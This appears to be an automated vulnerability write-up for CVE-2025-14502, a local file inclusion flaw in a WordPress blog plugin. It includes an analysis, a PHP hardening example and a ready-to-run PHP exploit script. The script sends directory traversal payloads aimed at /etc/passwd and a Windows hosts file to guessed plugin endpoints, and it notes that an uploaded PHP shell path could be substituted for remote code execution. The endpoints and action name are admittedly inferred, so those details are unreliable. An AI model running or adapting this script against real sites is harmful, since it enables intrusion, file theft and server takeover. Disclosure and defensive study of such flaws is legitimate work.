Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-14502: News and Blog Designer Bundle <= 1.1 – Unauthenticated Local File Inclusion (news-and-blog-designer-bundle)

Severity: Critical (CVSS 9.8)
CWE: CWE-98
Vulnerable Version: 1.1
Patched Version:
Disclosed: January 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-14502 (metadata-based):
This vulnerability is an unauthenticated Local File Inclusion (LFI) in the News and Blog Designer Bundle WordPress plugin, affecting all versions up to and including 1.1. The flaw resides in the handling of the ‘template’ parameter, allowing attackers to include and execute arbitrary PHP files on the server. The CVSS 3.1 score of 9.8 (Critical) reflects its network-based attack vector, low attack complexity, and high impact on confidentiality, integrity, and availability.

Atomic Edge research infers the root cause is CWE-98, Improper Control of Filename for Include/Require Statement. The plugin likely uses a user-supplied value from the ‘template’ parameter directly within a PHP include or require statement without proper validation. This conclusion is inferred from the CWE classification and the vulnerability description, as no source code diff is available for confirmation. The plugin fails to sanitize or restrict the file path, permitting directory traversal sequences or absolute paths.

Exploitation involves sending an HTTP request to a vulnerable endpoint that processes the ‘template’ parameter. Based on WordPress plugin patterns, this endpoint is likely a publicly accessible AJAX handler or a direct plugin file. An attacker can craft a request with a ‘template’ parameter containing a path to a malicious PHP file, such as ‘../../uploads/evil.php’ or a full server path. Successful exploitation leads to the execution of the included file’s PHP code.

Remediation requires implementing strict validation and sanitization of the user-controlled filename. The fix should validate the template parameter against a whitelist of allowed, safe file names. The code must also ensure the parameter does not contain directory traversal sequences (../) or absolute paths. Implementing proper capability checks to restrict access to authenticated users would also mitigate the unauthenticated attack vector.
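The root-cause and remediation paragraphs above carried into code, as an added example rather than the plugin's own source (which the analysis notes is unavailable): the inferred unchecked include beside a hardened loader that validates the template name against a fixed allow-list and then confirms the resolved path stays inside the template directory. The constant NBD_ALLOWED_TEMPLATES, the nbd_resolve_template()/nbd_load_template() names and the template directory layout are assumptions.

```php
<?php
// Added example, not the plugin's code. Shows the CWE-98 pattern the analysis
// infers and a hardened loader implementing the recommended allow-list fix.
// Function, constant and directory names are assumed.

// Inferred vulnerable pattern: the request value reaches include() unchecked, so
// '../../uploads/evil.php' or an absolute path is accepted as-is:
//   include $_REQUEST['template'];

const NBD_ALLOWED_TEMPLATES = ['grid', 'list', 'carousel']; // assumed template names

// Map a user-supplied template name to a file path, or return null if it is
// not acceptable. $base_dir is the plugin's template directory.
function nbd_resolve_template(string $template, string $base_dir): ?string {
    // 1. Exact, type-strict match against the allow-list. This alone excludes
    //    traversal sequences, absolute paths, NUL bytes and foreign extensions.
    if (!in_array($template, NBD_ALLOWED_TEMPLATES, true)) {
        return null;
    }
    // 2. Defence in depth: canonicalise and require the result to stay inside
    //    $base_dir, so a later loosening of step 1 (or a symlink) cannot escape.
    $base = realpath($base_dir);
    $path = realpath($base_dir . '/' . $template . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function nbd_load_template(string $template, string $base_dir): void {
    $path = nbd_resolve_template($template, $base_dir);
    if ($path === null) {
        http_response_code(400); // inside WordPress: wp_die() with a 400 status
        return;
    }
    include $path;
}

// Constructed demo: a throwaway template directory holding one real template.
$dir = sys_get_temp_dir() . '/nbd-demo-' . getmypid() . '/templates';
mkdir($dir, 0700, true);
file_put_contents($dir . '/grid.php', '<?php echo "grid template rendered\n";' . "\n");

// Inputs: one valid name plus the payload shapes named in the analysis.
foreach (['grid', '../../uploads/evil.php', '/etc/passwd', 'grid.php', 'GRID'] as $input) {
    printf("%-26s -> %s\n", var_export($input, true),
        nbd_resolve_template($input, $dir) === null ? 'rejected' : 'allowed');
}
nbd_load_template('grid', $dir); // only the allow-listed name reaches include()
```

Only 'grid' is reported as allowed; the two payload shapes, the name with an extension and the case-variant are all rejected before realpath() is consulted.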

The impact of successful exploitation is severe. Attackers can achieve remote code execution by including uploaded PHP files, as described. This grants full control over the server. The vulnerability also allows bypassing access controls to read sensitive system files like /etc/passwd. Attackers can leverage this to steal data, escalate privileges, or establish a persistent backdoor on the compromised WordPress site.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-14502 - News and Blog Designer Bundle <= 1.1 - Unauthenticated Local File Inclusion
// (The opening <?php tag must precede these comments; otherwise PHP emits them as literal output.)
/**
 * Proof of Concept for CVE-2025-14502.
 * This script attempts to exploit an unauthenticated Local File Inclusion (LFI) vulnerability
 * via the 'template' parameter in the News and Blog Designer Bundle WordPress plugin.
 * The exact vulnerable endpoint is inferred from common WordPress plugin patterns.
 * Two potential attack vectors are tested: a direct plugin file and the admin AJAX handler.
 */

$target_url = 'https://example.com'; // CHANGE THIS TO THE TARGET SITE URL

// Payload: Attempt to include a common sensitive file to confirm LFI.
// If file upload is possible, an attacker would use a path to their uploaded PHP shell.
$lfi_payloads = [
    '../../../../../../etc/passwd', // Unix system file
    'C:\Windows\System32\drivers\etc\hosts', // Windows system file
    // In a real attack, this would be a path to an uploaded .php file, e.g.,
    // '../../uploads/2025/04/shell.php'
];

// Candidate endpoints based on WordPress plugin structures.
// The plugin slug is 'news-and-blog-designer-bundle'.
$endpoints = [
    '/wp-content/plugins/news-and-blog-designer-bundle/includes/template-loader.php', // Common direct file pattern
    '/wp-admin/admin-ajax.php' // Common AJAX handler
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);

foreach ($endpoints as $endpoint) {
    $url = $target_url . $endpoint;
    echo "[*] Testing endpoint: $url\n";

    foreach ($lfi_payloads as $payload) {
        // For AJAX endpoint, the 'action' parameter is required. We use a plausible guess.
        if (strpos($endpoint, 'admin-ajax.php') !== false) {
            $postData = [
                'action' => 'nbd_load_template', // Inferred common action name pattern
                'template' => $payload
            ];
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);
        } else {
            // For direct file access, use GET with the template parameter.
            $attack_url = $url . '?template=' . urlencode($payload);
            curl_setopt($ch, CURLOPT_URL, $attack_url);
            curl_setopt($ch, CURLOPT_POST, false);
        }

        $response = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);

        echo "  [>] Payload: $payload | HTTP: $httpCode | Length: " . strlen($response) . "\n";
        // Check for indicators of successful file inclusion.
        if (strpos($response, 'root:') !== false || strpos($response, '127.0.0.1') !== false) {
            echo "  [+] LIKELY SUCCESS: Potential file inclusion detected.\n";
            echo "  [+] Sample response (first 500 chars): " . substr($response, 0, 500) . "\n\n";
        }
    }
}

curl_close($ch);
echo "[+] PoC execution complete.\n";
?>
